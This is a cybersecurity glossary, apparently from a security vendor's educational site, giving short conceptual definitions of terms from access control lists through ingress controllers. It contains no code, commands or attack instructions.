Cybersecurity 101: A Complete Cybersecurity Glossary

An access control list (ACL) is a list of permissions or rules that define who or what has permission to access a specific resource, such as computer systems and network resources.

Access logging is the process of recording and storing information about every attempt to access a digital system, server, or application. These records, called access logs, help cybersecurity professionals detect threats, troubleshoot issues, and maintain compliance.

An account takeover, or ATO, is an attack that occurs when a threat actor gains unauthorized access to a user’s account credentials and takes over the account to commit malicious activity, such as fraud or data theft.

Active Directory is a Microsoft Windows directory service that helps administrators configure permissions and network access to ensure security.

A directory service offered by Microsoft Windows, Active Directory (AD) helps administrators configure permissions and network access. AD controls who can access what resources, like files and printers, and makes it easier for IT teams to manage the entire network.

ARP spoofing is a cyberattack where a hacker intercepts data by tricking a device into sending messages to the hacker instead of the intended recipient. Also referred to as ARP poisoning.

An APT is a sophisticated and long-term cyberattack where threat actors secretly gain access to a network to steal sensitive data. These attacks are often highly targeted and difficult to detect, as attackers aim to remain hidden for extended periods.

Adversarial AI or adversarial machine learning (ML) looks to ruin the performance of AI/ML systems by manipulating or misleading them. These attacks on machine learning systems can occur at multiple stages across the model development life cycle.

An AiTM is an attack where the attacker intercepts data from a sender to the recipient and then from the recipient back to the send. AITM enables attackers to not just harvest credentials, but steal live sessions, allowing them to bypass traditional phishing prevention controls such as MFA, EDR, and email content filtering. It was formerly known as a Main-in-the-Middle (MitM) attack.

Adware is software that displays unwanted advertisements on your computer or mobile device. These ads can appear as pop-ups or banners, or even take over your entire screen. While usually not as harmful as other types of malware like viruses or ransomware, adware can be annoying and intrusive, slowing down your device's performance and potentially tracking your online activity for targeted advertising purposes.

A background program that performs tasks on a computer without direct user interaction.

An air gap is a security measure that physically isolates a network or device from external networks, including the internet, to prevent unauthorized access.

Air gapping is a cybersecurity technique where a computer or network is completely disconnected from the internet and any external networks. This physical separation creates a secure environment that’s highly resistant to cyberattacks.

A set of rules or steps a computer follows to solve problems or perform tasks, often used in encryption and data processing.

Allowlisting is a security measure that permits only pre-approved applications, users, or devices to access systems or networks.

Best practices and recommendations for scaling and enhancing security in AWS cloud environments.

AnonFiles operated as an anonymous file-hosting service that allowed users to upload and share files without registration, personal information, or tracking. While it officially shut down in August 2023, its impact on the cybersecurity landscape continues to influence how we think about anonymous file sharing, threat detection, and organizational security policies.

An anonymizer is a tool or service that hides your digital identity by masking your IP address and routing your internet traffic through intermediary servers.

Anti-spyware is specialized software designed to detect, prevent, and remove spyware from devices.

Antivirus is a type of software that is designed to prevent, search for, detect and remove viruses and other malware from a computer. AV software is typically installed on the endpoint to block malicious software from infecting the machine, mobile device or network. It works by scanning a file, program or application and comparing a specific set of code with information stored in its database. If the software finds code that is identical or similar to a piece of known malware in the database, that code is deemed malicious and is quarantined or removed.

An API (Application Programming Interface) gateway is software that acts as a go-between for clients (like apps or users) and back-end services.

API Security is a security practice that entails implementing strategies to protect data confidentiality, integrity, and availability. This includes establishing authentication and authorization protocols to ensure that only authorized users and applications can access the API.

An application server, or app server, is a software framework that acts as middleware between the front-end client (e.g., a browser or mobile app) and backend systems like databases. App servers manage the dynamic business logic that powers modern applications.

Application access refers to the ability of users to utilize software applications within a system or network.

The set of files and custom rules that make up a particular application.

An Application Delivery Controller (ADC) is a network device that manages and optimizes how applications are delivered to users across networks.

These occur when cyber threat actors take advantage of vulnerabilities within an application, usually to gain unauthorized access.

Application Performance Monitoring (APM) a strategy used to track the performance and availability of software applications to ensure they provide a high-quality user experience and meet service-level agreements.

Application security engineers are the people making sure your application software isn’t a vulnerable target for cyberattacks. These specialized security engineering gurus keep applications safe from threat actors who steal data, crash systems, and wreck reputations.

ASOC tools are a category of application security (AppSec) solutions designed to streamline and automate key workflows and security processes. These tools assist development teams in automating vulnerability management, risk assessment, and remediation and orchestrating data from various security solutions, thereby enhancing vulnerability testing and remediation through workflow automation.

ASPM is a vital practice focused on ensuring applications meet stringent security standards and identifying vulnerabilities.

Application services form the backbone of modern IT environments. Think of them as specialized workers in a digital factory—each one has a specific job to do, and they all work together to keep your business running smoothly.

Application whitelisting is a security approach where only pre-approved applications are permitted to run on a system. Any software not on the approved list is automatically blocked by default. This proactive security method is grounded in the principle of "allowlisting," offering a controlled environment to prevent unauthorized or malicious software from running.

The process of finding, fixing and preventing security vulnerabilities at the application level, as part of the software development process.

Artificial intelligence refers to computer systems that can perform tasks typically requiring human intelligence—like recognizing patterns, making decisions, and learning from experience.

An asset in cybersecurity is any physical or digital resource that has value to an organization and requires protection from cyber threats. Assets include hardware like servers and laptops, software applications, data and databases, network infrastructure, and even people within the organization.

An asymmetric algorithm is a type of public-key cryptography that uses two mathematically-linked keys, one that is public for encryption and one that is private fpr decryption. 

An attack vector is the method or combination of methods that cybercriminals use to breach or infiltrate a victim’s network illegally. Attack vectors are often complex and involve gathering intelligence and identifying weak points for exploitation to gain network access.

An audit event is any security-relevant occurrence within a system that is logged for review.

A file containing a collection of audit events, providing a record of system activity.

An audit log is a chronological, time-stamped record of every action and event that happens within a system or network.

Authentication is the process of verifying a user's or device's identity. Methods include passwords, biometrics (fingerprints, facial recognition), and security tokens.

AutoScanning is an automated cybersecurity process that continuously monitors systems, networks, and applications for vulnerabilities, malware, and security threats without requiring manual intervention.

Similar to a secret entrance into a house, backdoor attacks are hidden ways of bypassing normal authentication to get unauthorized access to a system. Backdoors can be intentionally created by attackers or unintentionally left by developers during the software development process.

Typically involving online or offsite storage, a backup or backing up saves data to a separate location to ensure its recovery in case of loss or damage.

A .BAT file (short for “batch file”) is a type of script file that automates commands on Windows systems. It carries out tasks by running a series of commands in sequence, using the Windows Command Prompt.

User behaviors are analyzed within networks and applications to find unusual activity that may mean “security threat”. This can involve monitoring user activities like logins, file access, and email interactions, to find deviations from typical patterns and examining the system itself for anomalies like unexpected resource consumption, unusual network traffic, or unexpected software changes.

Big Game Hunting (BGH) is a term used to describe sophisticated ransomware attacks that specifically target high-value organizations. These attacks are meticulously planned and aim for maximum financial gain by attacking businesses, hospitals, and government institutions.

Binary code is a coding system built on two symbols, typically 0 and 1, forming the binary number system. These symbols represent the “off” and “on” states of electronic circuits, enabling machines to process complex data.

A black hat describes a threat actor who uses advanced hacking skills for malicious purposes. They exploit vulnerabilities to steal data, disrupt services, or cause harm.

Blackholing is used to combat cyberattacks, especially DDoS attacks, by dropping harmful traffic. This method protects networks without affecting legitimate traffic. You’ll learn how it works, when to use it, and its limitations in risk management.

A blocklist is a security mechanism that blocks or prohibits the execution of programs on a known malicious list. It’s also a firewall list created to block IPs with malicious reputations.

Blue Team is a group of cybersecurity professionals responsible for defending an organization's systems and data by proactively identifying vulnerabilities and neutralizing potential threats.

Bluejacking is a type of Bluetooth prank where someone sends unsolicited messages to nearby devices with Bluetooth enabled. It does not involve taking control of the device or accessing its data.

A bootkit is a type of malware designed to infect a computer’s boot process and gain deep, persistent control before the operating system even starts.

Bots, also known as robots or chatbots, are automated software programs that perform tasks and simulate human conversation. In cybersecurity, bots can be used for various purposes, from threat detection to responding to customer inquiries.

Bot mitigation is the practice of spotting and preventing malicious bots from acting before they wreak havoc on your website, app, or network. 

A botnet is a collection of computers compromised by malicious code used to run a remote control agent, granting an attacker the ability to take advantage of system resources. Typically used for DDOS attacks, hosting false web services, or transmitting spam.

Bracketing in cybersecurity is the practice of limiting access to sensitive systems or data by granting permissions narrowly for only what’s needed, and only for the time it’s needed. It’s like having just the right key for one door instead of a master key for the whole building.

Brandjacking is the unauthorized use of a company's brand identity—including logos, domain names, social media profiles, and other brand assets—to deceive victims and carry out malicious activities.

A BYOD policy allowing employees to use personal devices for work, which can introduce security risks if not properly managed.

A browser extension is a small software module that adds functionality to your web browser. Examples include ad blockers, password management tools, or dark mode toggles.

A brute force attack is a type of cyber attack that use trial-and-error to guess login credentials and encryption keys systematically until successful.

BSOD stands for "Blue Screen of Death" which is the official stop error on a Windows machine that indicates a critical problem it cannot recover from without a reboot. 

A bug bounty hunter is an ethical hacker who participates in bug bounty programs to find and report security flaws in websites, apps, or other digital systems for a reward or recognition. They help organizations identify and fix vulnerabilities before cybercriminals can exploit them.

Built-in tools are pre-installed software utilities and features that come embedded within operating systems, applications, or cybersecurity platforms without requiring separate downloads or installations. These tools are ready to use right out of the box and provide essential functionality for system administration, security monitoring, and threat detection.

Business email compromise (BEC) is a phishing scam where threat actors impersonate a trusted source to convince others to give them sensitive information or take specific action.

Named after the songbirds, Ransomware Canaries describe the physical or virtual devices that mimic other devices to lure attackers, helping study their behaviors.

CAPTCHA stands for Completely Automated Public Turing Test to Tell Computers and Humans Apart. It’s designed to differentiate humans from bots by presenting tasks that are easy for people but difficult for automated programs. CAPTCHA helps safeguard websites from spam, fraud, and malicious bot activities.

The chain of trust in cybersecurity refers to a set of hierarchical relationships where trust is passed down from one entity to another. Each component in the system guarantees that the next is verified before execution to ensure that only authorized hardware and software are used within secure environments.

Developed by the Center for Internet Security, CIS benchmarks are comprehensive security configuration guidelines for specific technologies to help organizations fight cyber threats.

A Chief Information Security Officer (CISO) is a senior executive responsible for designing and implementing an organization's cybersecurity strategy. The role goes beyond technical expertise; it demands strategic thinking, leadership, and the ability to bridge the gap between security concerns and business objectives.

A clickfake interview is a fake job interview designed by cybercriminals to deceive targets into clicking malicious links, downloading malware, or sharing sensitive information. Think of it as a social engineering trap aimed at job seekers and companies alike.

Clickjacking, also known as a UI redress attack, is a method used by hackers to trick users into clicking something different from what they intend. Using deceptive design techniques, attackers overlay hidden or invisible elements (like buttons or links) over seemingly harmless interfaces.

A clientless VPN is a type of Virtual Private Network that allows users to connect securely to corporate resources through a web browser without installing dedicated VPN software on their devices.

Closed-Source Software is a proprietary software where the original source code is not shared with the public, allowing the owner to maintain exclusive control over its development and distribution.

A security checkpoint between cloud users and applications, CASB manages and enforces data security policies including authentication and encryption.

Cloud application security is the process of securing cloud-based software applications throughout the development lifecycle.

Protecting cloud-based software applications throughout their development lifecycle.

Cloud-based means storing, managing, or accessing your data and apps over the internet, not on your computer or servers. Instead of buying and maintaining physical hardware, you use remote resources from a third-party provider.

In-depth evaluations of cloud infrastructures to identify and mitigate security risks, ensuring a strong security posture.

Cloud computing provides online access to shared pools of configurable computing resources like servers, storage, applications, and services.

Cloud data security is the technologies and policies that protect data in the cloud from loss, leakage, misuse, breaches, and unauthorized access.

Cloud governance is a collection of policies and practices that control how an organization uses cloud computing resources. It ensures security, compliance, and efficient operation by setting clear rules for accessing and managing cloud systems.

Procedures to follow when a cybersecurity incident occurs in a cloud environment.

Cloud native are principles and practices for building secure applications in the cloud, essential for modern software development.

The comprehensive framework of hardware, software, and infrastructure protecting cloud environments and their components.

Cloud security best practices are recommended practices for organizations to implement during cloud adoption to protect against cyberattacks.

Cloud Security Frameworks a structured sets of guidelines and best practices designed to help organizations secure their cloud environments and ensure compliance with regulatory standards.

Sets of guidelines and controls for securing data, applications, and infrastructure in cloud computing environments.

Cloud Workload Protection, or CWP, is a cybersecurity solution designed to monitor, detect, and defend runtimes like applications, containers, virtual machines, and serverless functions across cloud environments. 

Systems, applications, and operations hosted or conducted over the internet.

Code security is the practice of protecting software code from vulnerabilities that could be exploited by cyber attackers. It involves identifying, managing, and eliminating weaknesses during the software development lifecycle to ensure applications are safe and secure.

Cold storage is a method of archiving data by storing the data on a database that is typically not quickly accessible.

A command and control (C2) center, or C2 server, in cybersecurity refers to the infrastructure used by cybercriminals to communicate and control compromised devices in targeted networks. Once malware infects a device, attackers use this server to issue commands, extract stolen data, and maintain control.

Common Cash App Scams:  Fraud schemes targeting Cash App users range in complexity, but most involve exploiting human trust through manipulation or social engineering.

Compiler security refers to the practice of protecting software applications from vulnerabilities that can be introduced or exploited during the compilation process, as well as implementing security measures within compilers themselves to prevent malicious code injection and ensure safe code generation.

A computer worm is a standalone malware program that can replicate itself and spread across networks without needing any input from you.

Conditional access (CA) is a security process that decides who gets access to your organization’s resources, under what conditions, and based on real-time contexts.

A lightweight package of application code with dependencies such as a specific version of programming language runtime and libraries required to run a software service. Common container software are

Container security refers to the practices, tools, and policies designed to protect containerized applications, their underlying infrastructure, and their entire lifecycle—from development to deployment and runtime.

Containerization is a method of virtualization. Instead of virtualizing all components of a physical machine like in the case of Virtual Machines (VMs), containers only virtualize applications and their dependencies.

Conti is a highly sophisticated ransomware strain designed to encrypt files and extort money from its victims. First observed in 2020, Conti ransomware has become infamous for targeting organizations globally and demanding large ransoms, often disrupting business operations during attacks.

Continuous monitoring is the practice of constantly keeping tabs on your IT systems for any suspicious or malicious activity.

Cookies are small text files created by websites and stored on your browser, used to recognize you and track certain aspects of your activity.

Credential stuffing is a type of cyberattack where stolen username-password combos (from past breaches) are reused in automated login attempts across various platforms.

The act of stealing personal information such as usernames, passwords, and financial information to gain unauthorized access.

A crypto key is a digital password that lets you encrypt and decrypt sensitive data.

Cryptocurrency is digital or virtual currency, often demanded in ransomware attacks due to its decentralized and untraceable nature.

A cryptographer protects data through encryption, ensuring that private information stays that way. Using mathematics and computer science, cryptographers create algorithms and security protocols that encrypt sensitive data, making it accessible only to authorized users.

A cryptographic algorithm is a complex set of mathematical instructions designed to transform readable data (plaintext) into coded gibberish (ciphertext)—and back again for those who hold the proper key.

A cryptor is a software tool used to encrypt or otherwise obfuscate the code within malware. Its main goal is to hide the code's true purpose from security systems like antivirus software or static-analysis tools, ensuring the malware remains undetected until it activates.

Capture The Flag (CTF), a cybersecurity exercise where participants find hidden text strings, called "flags", in vulnerable programs or websites. The Huntress CTF, is our our yearly month-long competition of daily challenges designed for experts and enthusiasts alike.

CVSS is the Common Vulnerability Scoring System is a standardized framework used to assess and communicate the severity and risk level of software vulnerabilities.

Cyber insurance is financial protection for businesses if a cyberattack happens. It can cover costs associated with data breaches like legal fees, reputation damage, and business interruption.

Cyber operations are activities that protect, secure, or target computer networks and systems to achieve specific objectives.

A cyber risk analyst identifies, evaluates, and helps manage the risks that threaten a company’s digital assets. Their job is to figure out which cyber threats can happen, how likely they are, and what damage they could cause, and then offer practical ways to defend against them.

A cyber threat is any shady move in cyberspace to damage, disrupt, steal, or get unauthorized access to computer networks or systems. It’s any potential danger posed by hackers, viruses, insider risks, or badly managed software that compromises security controls.

A cyberattack is defined as any malicious attempt to disrupt, damage, or gain unauthorized access to computer systems, networks, or devices.

Cybercriminals are individuals or groups who initiate cyberattacks, also known as threat actors.

Cybersecurity refers to the practices, technologies, and processes designed to protect internet-connected systems, including computers, networks, and data, from cyber threats like malware and ransomware.

A cybersecurity manager oversees an organization's security operations, leading teams to protect against cyber threats and ensure compliance with security policies. They bridge the gap between technical security measures and business strategy, managing both people and technology to maintain a strong security posture.

Cybersquatting is registering and using an internet domain name identical or similar to trademarks, service marks, personal names, or company names with the intent of hijacking traffic for financial profit or delivering malware payloads.

At its core, a cyberweapon is a software-based tool or malicious code designed to disrupt, damage, or gain unauthorized access to information systems, networks, or physical infrastructure.

Dangling markup refers to unclosed or partially completed HTML tags within a web page’s code. Cyberattackers exploit this vulnerability to inject malicious code into a site, often exposing sensitive data or enabling unauthorized actions.

While the dark net does have its shadowy corners, the truth is nuanced. It’s a hidden layer of the internet that most of us will never see, but for cybersecurity professionals, IT experts, and even curious researchers, understanding it is critical to staying ahead of threats in today’s online landscape.

Dark web activity refers to actions occurring on the “dark web,” a hidden part of the internet not indexed by search engines. This includes both legitimate uses, like maintaining privacy, and illicit activities such as illegal data trading and cybercrime operations.

Dark web monitoring is the process of searching for and tracking your organization's information on the dark web. This includes leaked passwords, stolen credit card information, or even intellectual property. By detecting these breaches early on, people and organizations can take steps to mitigate the damage and prevent further harm.

A data breach describes a security incident where data is illegally accessed, stolen, or released by an unauthorized individual or group. This can include personal data like Social Security numbers and financial information, as well as corporate data like customer records and intellectual property.

Data compliance is the practice of your company handles information in line with laws and standards, proving you know how to protect sensitive data.

Data encryption is the process of converting readable data (plaintext) into an unreadable format (ciphertext) using mathematical algorithms and secret keys.

Data Encryption Standard (DES) is a type of symmetric key encryption used to protect digital data.

Data exfiltration refers to the unauthorized transfer of data from a device or network. Cybercriminals use malware, insider threats, or exploiting vulnerabilities to steal data and transmit it to locations under their control. Threat actors can then use stolen data for malicious purposes like identity theft, espionage, or financial gain.

Data flow mapping is the process of visually charting and tracking how data moves through a system from the moment it’s collected to when it’s deleted or archived, providing a clear view of data journeys, enabling organizations to identify vulnerabilities, enhance security, and comply with privacy laws such as GDPR.

Data logging is the digital equivalent of the security camera system. It is the process of automatically collecting and storing data from various sensors and points within a system over time.

Data loss prevention (DLP) is a set of policies, practices, and tools used to make sure sensitive data isn’t lost, misused, or accessed by unauthorized users. DLP solutions perform both content inspection and contextual analysis of data sent from or across corporate networks to give visibility into who is accessing data and systems (and from where) and filter data streams to restrict suspicious or unidentified activity.  You can use DLP solutions to reduce the risk of sensitive data leaking outside your organization, and some solutions go beyond simple monitoring and detection to give alerts, enforce encryption, and isolate data as needed.

Data obfuscation hides sensitive data by replacing, masking, or scrambling it so unauthorized users can’t read or misuse it.

Think of data onboarding as the gateway between raw security information and actionable threat intelligence. Just like onboarding a new employee involves gathering their information, setting up systems, and ensuring they can work effectively, data onboarding takes scattered security logs and transforms them into a unified, analyzable format.

The data plane is the network component responsible for actually forwarding data packets from one location to another. It's the "worker" of the network that handles the heavy lifting of moving your data around.

Data poisoning is a form of cyberattack where malicious actors intentionally manipulate the training data of machine learning (ML) models to influence their outcomes. This can significantly alter the effectiveness and accuracy of the models, often with harmful consequences for organizations relying on AI and ML systems.

Data portability is the ability to transfer personal data easily from one service provider to another.

Data privacy in cybersecurity refers to protecting personal or organizational data from being accessed, misused, or shared without consent.

Data protection focuses on safeguarding personal data from corruption, compromise, or loss, while data security encompasses all measures to guard against unauthorized access to digital data.

Data Sovereignty is the legal principle that digital data is subject to the laws and governance of the specific country or jurisdiction in which it is physically located.

Data traffic is what is generated every time an email is sent, a video is watched, or a website is visited. It is traffic that travels across a network to reach its destination.

Database monitoring involves continuously tracking database activities to optimize performance and ensure security. This combines performance monitoring like CPU usage and memory consumption, security monitoring for suspicious activities, and accessibility monitoring. 

Distributed Denial of Service (DDos) is when multiple systems coordinate an attack to overwhelm a system or network making it unavailable to users.

At its core, a decompiler is a tool that takes machine-readable code (compiled code) and converts it back into human-readable, high-level code. It reverses the process of compilation. While compilers transform human-friendly code into machine-readable code that a computer can run, decompilers go the other way around.

While both are hidden from search engines, the deep web consists of legitimate, password-protected content like online banking and private databases, whereas the dark web is a small, intentionally hidden subset that requires specialized software like Tor to access for purposes of anonymity and sometimes illicit activity.

A deepfake is a video or audio clip generated using artificial intelligence (AI) that mimics a person’s likeness or voice to depict events or statements that never actually happened. These AI-forged creations can seem incredibly realistic and are often used in scams, misinformation campaigns, and other forms of digital manipulation, sparking significant cybersecurity concerns.The word "deepfake" is a mash-up of “deep learning” (a type of AI) and “fake,” describing how this technology uses advanced machine learning to create realistic imitations.

A default deny approach in cybersecurity is a strict security policy that blocks all actions unless explicitly permitted.

Files required for software to run, such as DLLs in Windows.

Detection engineering is the process of designing, building, and refining custom ways to spot cyber threats in real time.

Ever wondered how hackers crack passwords so quickly? While movies show dramatic keyboard battles, the reality is often much simpler—and scarier. Dictionary attacks represent one of the most straightforward yet effective methods cybercriminals use to break into accounts, and they're happening right now across the internet.

A digital certificate is like an online passport. It’s an electronic document used to prove the authenticity of a website, server, user, or device. It ensures that the entity you’re interacting with is who they say they are.

A digital footprint is the data you create whenever you use the internet, including things you post, share, or interact with online.

A digital signature is a cryptographic technique that ensures the authenticity and integrity of a digital message or document.

Procedures to recover data and operations following a cyberattack.

A disaster recovery plan is a business's documented plan that outlines how an organization will restore IT infrastructure, data, and critical business operations following a disruptive event. 

Data Loss Prevention is a solution that detects and blocks the extraction of sensitive data by internal or external sources.

DNS Changer is a type of malware that alters a device's Domain Name System (DNS) settings to redirect users to fraudulent or malicious websites without their knowledge.

DNS poisoning, also known as DNS spoofing or DNS cache poisoning, involves injecting fake data into a DNS resolver's cache. This attack leads users to malicious websites instead of their intended destination.

DNS protection is a security service that filters and blocks malicious domain requests before they can establish connections to harmful websites or servers.

Think of DNS sinkholing as setting up a fake address that leads nowhere. When a device on your network tries to connect to a malicious website, instead of getting the real IP address, it receives a bogus one that either goes nowhere or leads to a server you control.

DOC files represent a significant component of organizational document management and can present unique security challenges.

Domain admin groups are groups with administrative rights across all domains within an organization, typically found in Windows Active Directory.

Double Tagging is a sophisticated network attack where a hacker adds an extra VLAN tag to a data packet to bypass security controls and gain unauthorized access to a different VLAN.

A downgrade attack is a type of man-in-the-middle (MITM) attack where a hacker forces your system to drop down to an older, less secure protocol or encryption method, even when newer, safer versions exist.

A downloader is a type of malicious software designed to install additional harmful programs onto a victim’s device without their knowledge.

A type of ransomware that threatens to release sensitive data if the ransom is not paid.

Datagram Transport Layer Security (DTLS) is a security protocol based on TLS that provides encryption, integrity, and authentication for real-time, delay-sensitive applications like VoIP and gaming that use the fast but "unreliable" User Datagram Protocol (UDP).

Dump data is a complete copy of information from a database that's been exported into a structured file format. It includes both the actual data stored in the database and the underlying structure that defines how that data is organized.

Advanced ACLs requiring user authentication before accessing resources.

Learn the differences between endpoint detection and response (EDR), managed detection and response (MDR) and extended detection and response (XDR).

Users typically have limited access to a system. To do certain tasks (like installing software or modifying system settings), they might need more privileges (like administrator rights). Elevation control lets users run specific applications as administrators without having admin privileges.

Elevation control is a cybersecurity practice that manages and restricts when users can access elevated privileges (like administrator rights) on computer systems. Rather than giving users permanent admin access, elevation control grants these higher-level permissions only when specific, approved applications need them.

Email spoofing is a type of cyberattack that targets businesses by using emails with forged sender addresses. Because the recipient trusts the alleged sender, they’re more likely to open the email and click on things like malicious links or attachments.

EMV is a global payment standard for chip-based debit and credit cards that provides enhanced security against fraud compared to traditional magnetic stripe cards.

Encryption is the process of converting data into a coded format to prevent unauthorized access.

End-to-end encryption is a method of securing communication by ensuring that only the sender and the intended recipient can read the messages or access the data being exchanged. 

Devices like computers, mobile phones, and servers that connect to and communicate with a network.

An integrated endpoint security solution designed to detect, investigate and respond to cyber threats. EDR solutions offer greater visibility into what’s happening on endpoints by recording granular endpoint activity and monitoring for signs of malicious behavior. If the EDR technology detects any of these malicious signs, it will provide security analysts with the necessary information to conduct both reactive and proactive threat investigations and minimize the impact of an attack.

Endpoint monitoring involves the continuous monitoring and management of devices that connect to a network, such as computers, mobile devices, and servers.

Security technologies such as antivirus, data encryption, and data loss prevention that work together to detect and prevent security threats.

Enterprise solutions are software designed to integrate multiple systems within an organization to streamline processes.

Event logging is the act of recording every action—from user logins to system errors—with timestamps, making it possible to reconstruct what happened during security incidents. 

An Evil Twin Attack is a sophisticated type of Man-in-the-Middle (MitM) attack where a cybercriminal deploys a fraudulent Wi-Fi access point that mimics a legitimate network

Executables is a computer files containing machine code that perform specific tasks or run applications when executed by a processor, but which can also harbor malicious risks like malware.

Code files or programs that instruct a computer to perform specific actions when opened.

An exploit is the act of taking advantage of vulnerabilities in systems or software to perform malicious acts.

Exploit Kit is a pre-packaged toolkit used by cybercriminals to automatically identify and exploit vulnerabilities on a user's device to deliver malware.

An exploit pack is a collection of exploit code bundled together and designed to target multiple software vulnerabilities simultaneously.

“Exploitation in the Wild” refers to the active use of software vulnerabilities by cybercriminals in real-world attacks.

Extended Detection and Response (XDR) is a comprehensive cybersecurity platform that collects and correlates threat data from multiple security layers—including endpoints, networks, cloud environments, and identity systems—to provide unified threat detection, investigation, and response capabilities.

Extensible Authentication Protocol (EAP) is a security framework that allows networks to support multiple authentication methods, such as passwords, certificates, and smart cards. EAP is critical for controlling who gets access to wireless networks, VPNs, and more, making it a must-know for cybersecurity professionals.

A false flag in cybersecurity is when bad actors launch an attack but pretend to be someone else.

A false positive virus occurs when antivirus software mistakenly flags a legitimate file or program as malicious. This means the file is safe to use, but due to its characteristics or behavior, your antivirus incorrectly categorizes it as harmful.

FDE encrypts everything on your hard drive, including the operating system, applications, and user data. It provides automatic, transparent protection without requiring users to manually encrypt files. FDE is essential for compliance with data protection regulations like GDPR and HIPAA.

FDQN stands for Fully Qualified Domain Name and is the complete address of a resource on the Internet or a private network.

FISMA is a U.S. federal law enacted in 2002 that requires federal agencies to implement information security programs to protect their data and information systems. It sets standards for how agencies should assess, manage, and mitigate cybersecurity risks.

File Integrity Monitoring is a security process that monitors and analyzes the integrity of assets including file systems, directories, databases, and the Operating System.

Fileless malware operates entirely within a computer's memory without ever touching the hard drive. This malicious software may utilize legitimate tools or embed code in legitimate files, making detection challenging.

A firewall is a security system that monitors and filters incoming and outgoing network traffic to prevent unauthorized access to an organization's network. It acts as an outer barrier that either allows or blocks network traffic based on a predefined set of rules.

Footholds are methods used by threat actors to reinstall malware on a device after it has been cleaned. Also known as “Persistence Mechanisms.”

At its core, the role of a forensic analyst is a mix of detective work and tech wizardry. They don’t just investigate cyber incidents; they uncover entry points, analyze attacker behavior, and figure out the root cause.

A form grabber is a type of malicious software that secretly captures data entered into web forms, such as login credentials, credit card numbers, and personal information, before it gets encrypted and transmitted to legitimate websites.

Fraud prevention is the comprehensive set of proactive strategies, policies, and technologies designed to identify, deter, and stop fraudulent activities before they can cause financial or reputational damage to an organization.

A macOS TCC permission that allows software to access sensitive user information.

The GDPR is a European Union regulation on information privacy that governs how the personal data of people in the EU can be processed and transferred.

A generic device is any unidentified system, often lacking device-specific classification, that connects to a network.

Glitching is disrupting a device’s hardware in carefully targeted ways to force the device to behave unexpectedly, potentially bypassing its security measures.

A Golden Ticket attack refers to exploiting weaknesses in Kerberos to gain unauthorized access to Windows Active Directory controls, requiring initial system access.

Google Cloud Platform (GCP) is a suite of cloud computing services provided by Google that allows organizations to build, deploy, and scale applications using the same infrastructure that powers Google’s own products.

Google Cloud Platform is one of the 3 major cloud providers. GCP lets businesses use Google's infrastructure and technology to build and run applications, analyze data, and power their operations.

When you think of Google, you probably imagine searching for recipes, troubleshooting tech issues, or finding the best local pizza. But in the wrong hands, Google can also be used for something far more dangerous: Google Dorking.

A grabber is a type of malicious software (malware) used to secretly capture and steal sensitive information, like passwords, from a victim’s device. Think of a grabber as a data thief running quietly in the background, pocketing secrets you didn’t mean to share.

A hacker is someone who uses their technical know-how of computers, programming, or networking for unauthorized access to systems or networks.

Hacktivism is the use of computer hacking techniques to promote or push ideological, political, or social agendas. Unlike traditional hacking, which often focuses on financial gain or curiosity, hacktivism is fueled by motivations such as resisting censorship, advancing human rights, combating surveillance, or advocating for social or environmental justice. 

A ”handshake protocol," is a process that systems use to establish a secure connection before transmitting data. It ensures both parties in the communication verify their identities and agree on the rules for the interaction, such as encryption standards.

Hashing is a one-way cryptographic function that converts any input (such as a file, password, or message) into a fixed-length string of characters known as the hash value, or digest. Whether the input is large or small, the output length remains consistent for any given hashing algorithm.

A US federal law established in 1996, HIPAA mandates the protection and confidential handling of people’s medical information.

Heap Spraying is a specialized cyberattack technique where an attacker floods a system's memory "heap" with malicious code to increase the chances of a successful exploit.

HIPAA is a US federal law that establishes national standards for protecting sensitive patient health information from being disclosed without the patient's consent or knowledge.

A hoax attack is a fake warning about a virus, security threat, or cyber incident that spreads through email, social media, or other communication channels

A honey token is bait for cybercriminals. Unlike honeypots (which simulate entire environments to attract attackers), honey tokens are single fake artifacts embedded within a system. These can be fake credentials, files, API keys, or even email addresses. Their purpose? If accessed or used, the honey token triggers an alert, instantly telling defenders there’s an intrusion.

Honeypots are cybersecurity mechanisms that gather intelligence on cybercriminals' identities, methods, and motivations. They use decoy targets to lure cybercriminals away from legitimate targets.

Hooking is a software technique that intercepts interactions between programs or system components. It is useful for both enhancing program functionality and monitoring or manipulating behavior, sometimes with malicious intent.

A horizontal port scan is when someone probes one specific port across multiple devices on a network. The goal? To find and exploit devices running vulnerable software or services on that port.

HTTP/2 has revolutionized how we interact with the web, offering vastly improved speeds and performance over its predecessor, HTTP/1.1.

HTTP/3, based on QUIC, is the third major version of the Hypertext Transfer Protocol (HTTP), that offers lightning-fast connections.  

Human identity in cybersecurity refers to the unique digital characteristics, credentials, and attributes that verify and authenticate a real person's access to systems, applications, and data. It encompasses usernames, passwords, biometric data, and behavioral patterns that distinguish one individual from another in digital environments.

Human Risk Management (HRM) is a comprehensive approach to identifying, assessing, and reducing cybersecurity risks associated with human behavior within an organization. It emphasizes that people are both a company’s first line of defense and a potential vulnerability when it comes to cyber threats.

Human Intelligence (HUMINT) is all about collecting valuable information from humans rather than technical sensors or open sources. Think interviews, surveillance, chatting with insiders, or even posing undercover on dark web forums. It’s not just eavesdropping or running scripts; it’s digging into motivations, relationships, and even lies.

A hypervisor, also known as a Virtual Machine Monitor (VMM), is software or firmware that enables the creation and management of virtual machines (VMs).

IaC scanning is the automated analysis of Infrastructure as Code (IaC) files to detect misconfigurations, vulnerabilities, and policy violations that could lead to security risks.It helps security teams catch and fix weak points in cloud and DevOps environments before deployment, reducing the risk of breaches, compliance failures, and downtime.

Identity and access management (IAM) specialists ensure that only the right people have access to the right resources—at the right time.

Identity segmentation is the process of separating and categorizing user identities in a network to improve security and reduce risk. This approach ensures that users only have access to what they need, limiting unnecessary exposure to sensitive data or systems.

IEEE 802.1 working group creates specifications that define how network devices should behave at the data link layer of the OSI model

IIS logs are text files that log every request made to a web server running Internet Information Services (IIS). They record who did what, when, and how on your site.

An incident responder is a cybersecurity professional who detects, investigates, and manages the aftermath of cyber incidents to minimize damage and restore systems to operational status.

Incident response in cybersecurity refers to the strategies and procedures for responding to cyber threats and attacks in a network.

An Indicator of Attack (IOA) refers to behavioral patterns or activities that indicate a cyberattack is either underway or highly likely.

InfoSec is the policies and procedures put in place by the organization to protect sensitive data from unauthorized access.

IaaS is a type of cloud computing where the provider offers the customer the ability to create virtual networks within a cloud-based computing environment.

An ingress controller is a Kubernetes (commonly referred to as K8s) component that manages external access to services within a cluster, acting as a traffic director that routes incoming requests to the right destinations.

